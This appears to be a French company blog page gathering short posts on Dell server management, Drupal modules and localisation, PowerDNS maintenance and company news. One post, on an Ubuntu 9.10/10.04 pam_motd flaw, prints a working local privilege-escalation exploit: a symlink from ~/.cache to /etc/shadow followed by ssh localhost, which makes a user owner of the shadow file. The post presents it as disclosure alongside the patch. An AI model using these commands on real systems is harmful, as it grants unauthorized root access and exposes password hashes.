Blogs

Aujourd'hui, nous allons nous intéresser au successeur d'IT Assistant de DELL.

IT Assistant était supposé nous permettre de maintenir l'ensemble des mises à jours en provenance de chez DELL via un outil centralisé.

Lors de sa mise en oeuvre, nous avions dans les prérequis d'installer OMSA Open Manage Sever Administrator.

Pour rappel, c'est un package qui permet de controler l'état de la machine ainsi que de faire certaines manipulations du controleur RAID (PERC). Il vient avec une interface d'administration et un sous agent SNMP.

IT Assitant était inutilisable, ergonomie digne des années 90 ainsi que de nombreux dysfonctionnements.

Je n'ai jamais été en mesure d'effectuer une mise à jour distante avec.

Dell a sorti récemment le successeur d'IT Assitant, nommé Open Manage Essentials. Il vous permettra de monitorer l'état des serveurs Dell de 12eme Génération SANS agent (exit OMSA), de mettre à jour vos firmwares le tout dans une interface assez jolie.

Ressources pour installer OME:

- Wiki OME: http://en.community.dell.com/techcenter/systems-management/w/wiki/1989.openmanage-essentials.aspx

Voici quelques modules qui m'ont été bien utiles pour nos derniers projets Drupal :

• http://drupal.org/project/mail_edit : Permet d'éditer tous les mails sortant du drupal utilisant drupal_mail()

• http://drupal.org/project/menu_block : Crée des blocks de menu avec choix des niveaux à afficher

• http://drupal.org/project/menu_breadcrumb : Pour obtenir un breadcrumb identique à l'arborescence du menu actif

• http://drupal.org/project/menu_firstchild : Permet de faire pointer le parent d'un menu vers son premier fils

• Utiles pour l'intégration :

  • http://drupal.org/project/block_class : Permet d'ajouter des classes sur chaque bloc lors de l'édition d'un bloc

  • http://drupal.org/project/cck_blocks : Possibilité de créer un bloc pour un CCK donné, ex Créer un bloc auteur de l'article dans barre de gauche quand on est sur un contenu article

• http://drupal.org/project/custom_search : Modifie l'apparence du block rechercher par défaut + choix de critères avancés

• http://drupal.org/project/audiofield : CCK audio pour D6 et surtout pour field D7

C'est avec choc et douleur que nous avons appris la disparition soudaine de Mohamed Behmane le vendredi 18 février 2011. Ce décès brutal nous laisse d'autant plus sans voix, nous, ses collègues à OWS, que depuis son arrivée en octobre 2010, nous avions tissé des liens forts propres au travail en équipe dans une petite structure.

Aussi, au nom de toute l'équipe, nous tenions a rendre un dernier hommage à Mohamed, et dire combien il nous manquera : ses qualités tant humaines que professionnelles, sa joie de vivre, son humour et son sérieux, apportaient tous les jours leur contribution positive à l'aventure humaine qu'est Open Web Solutions.

Mohamed, tu nous manqueras, tout simplement. Puisses-tu reposer en paix.

Nous tenions aussi à renouveler toutes nos condoléances à la famille et aux proches.

Amine, Arthur, Cédric, Danuta, David, Franck, Julien, Ibrahima, Martine, Pierre, Pierre, Stéphane, Sylvain

Chez Open Web Solutions, on utilise Drupal, on respire Drupal, on mange Drupal, on vit Drupal.

Pour le développement de nos sites web, nous utilisons notamment le module coder de drupal qui permet de valider, via sa fonctionnalité de Code review, le respect des conventions de code de Drupal. Le respect de ces conventions permet notamment de nous sauvegarder d'erreurs mineures ainsi que d'oublis qui pourraient engager la sécurité de nos développements, de s'assurer de la concordance avec les API de drupal et de faciliter la relecture du code via un autre développeur Drupal.

Pour assurer cette relecture de code automatique, coder utilise des expressions régulières mais il lui arrive de temps en temps de se tromper. Loin de moi l'idée qu'il se trompe sur la forme, mais il est parfois nécessaire de faire des infractions aux conventions de code pour, par exemple, étendre les fonctionnalités de sécurité. Ces infractions sont donc connues et nous demandons à coder de les ignorer.

PowerDNS est un serveur DNS très fonctionnel, je ne vais pas m'attarder sur le fait, qu'à mon sens, c'est le plus complet et stable actuellement.

Je ne vais pas non plus vous détailler toutes les possiblités, vous trouverez plein d'informations sur les sites suivant:

- http://wiki.powerdns.com/trac

- http://www.powerdns.com

Lors de l'utilisation de ces serveurs en mode SUPERmaster et SUPERslave, tous les domaines des supermasters sont répliqués vers le superslave (sans entrer dans un système d'axfr par domaine).

Après quelques années d'utilisation, notre superslave avait environ:

* 28 618 entrées pour les domaines

* 208 233 entrées d'enregistrements.

Nous avions un souci de charge sur cette machine et la plupart des domaines en base de données (Mysql) n'étaient plus sous notre gestion. Il en résultait des délais très long pour un simple notify et des désynchronisations de domaines.

La création d'un script s'imposait afin de vérifier l'ensemble des domaines du SUPERslave et ainsi récupérer des performances acceptables.

Quelques mots sur notre architecture, nous avons 1 serveur à l'extérieur de notre réseau qui est superslave de nos ip ranges (soit une quinzaine de supermasters).

Fichers attachés: 

Script Bash pour nettoyer les domaines non valides dans PowerDNS

Aujourd'hui, une faille de sécurité assez simple à mettre en oeuvre a été révélée. Elle n'impacte que la distribution Linux Ubuntu sur les versions 9.10 et 10.04.

Dès ce matin, nous avons pu constater qu'une mise à jour critique était disponible sur la distribution Ubuntu.

Celle-ci concerne donc ce problème de sécurité qui permet à n'importe quel utilisateur loggué sur la machine d'acquérir les droits du compte root (superadmin).

L'exploit se base sur une faiblesse du module pam_motd qui est intégré dans la chaine d'authentification.

Il est donc possible de simplement le retirer la pile pam via les fichiers de configuration ou de mettre à jour comme préconisé.

Je vous communique l'exploit à titre d'information:

Admettons que je sois loggué sur la machine sous l'utilisateur: franck

---

rm -rf ~/.cache

ln -s /etc/shadow ~/.cache

ssh localhost

---

Vous voila propriétaire du fichier /etc/shadow !

Ce qui vous permettra bien évidemment de récupérer l'accès root...

En auditant ou simplement en voyant récemment quelques sites réalisés par mes concurrents mais néanmoins concurrents sous drupal 6, une évidence m'a sauté au visage : le Back-Office contributeurs (webmasters, éditeurs, journalistes...) de la plupart des sites réalisés sous drupal n'est souvent pas à la hauteur du niveau fonctionnel du Front-Office. Je ne dis pas que c'est le cas de tous les projets sous drupal, mais le manque de temps (et surement de poste budgétaire), et/ou de connaissance de certains modules sur ces sites font qu'un super site se transforme en cauchemar à administrer pour le client, avec une interface soviétique à faire pâlir d'envie Youri Gagarine.

Forcément, drupal est réputé pour sa faible ergonomie par défaut, et cela fait les beaux jours des éternels trollsdébats sur la guerre des mondes Wordpress/Drupal, comme dans ce genre de manifestation où votre serviteur était présent (bien que flou).

On ne va pas verser dans l'émotion, ni dans le plan téléfilm américain avec nos épouses à nos côtés et le drapeau derrière nous, mais cela me fait quand même chaud au coeur de prendre 2 minutes pour se retourner et se dire : Waouh, déjà 9 ans qu'on fait de l'Open Source, et toute l'équipe est toujours aussi excitée à la sortie d'un nouveau module drupal ou à la découverte de nouvelles applications libres qui vont révolutionner le monde.

Et la chose dont je suis le plus fier aujourd'hui est que OWS ait réussi à grandir et évoluer tout en gardant ses valeurs fondatrices : le libre, le partage des connaissances (cf Cooletude , qui aura 10 ans d'existence bientôt), la conviction que le web est un marché porteur même dans les moments difficiles. Je suis de plus très fier de travailler avec toute l'équipe OWS, d'avoir des collaborateurs de si grande valeur humaine et professionnelle

</mode_discours_pdg>

Sinon désolé de notre silence qui commence à durer sur ces blogs, nous avons pas mal été occupés ces derniers temps mais on vous promet plein de nouveaux sites pour le printemps, nous n'avons pas chomé depuis.

Il fut un temps où avoir une interface d'un site drupal en français relevait du défi, à la fois humain et technologique (comment, où, avec quels outils....).

Rassurez-vous c'était un problème commun à toutes les versions non anglophones de drupal et sans la contribution de quelques volontaires passionnés et technophiles (dont votre serviteur), la traduction des modules drupal n'avançait pas beaucoup et n'était pas très ouverte.

Heureusement Gabor Hojtsy, un des core developpeur drupal, a lancé en septembre à l'occasion du DrupalCon Paris, une interface dédiées à la localisation (la traduction en langage informatique) de drupal et de ses modules. Bien que encore en version Beta et pouvant être encore amélioré, localize.drupal.org a connu un engouement mérité de la part de la communauté francophone, car proposant sur une seule interface web les fonctionnalités suivantes :

A force de conseiller ce lien à nos clients, je me suis demandé pourquoi je ne l'ai pas posté plus tôt sur ce blog :

Univers Netvibes Drupal

Il rassemble en une page (et plusieurs onglets) l'ensemble des outils et sources d'informations indispensables sur drupal, pour les développeurs mais aussi pour les utilisateurs : nouvelles sorties de modules, actualités des blogs influents, alertes de sécurité, forums....

Mis à part le flux deli.cio.us de OWS (le bloc en bas de la colonne droite des blogs OWS), je ne vois pas d'outil plus essentiel pour votre culture drupal :)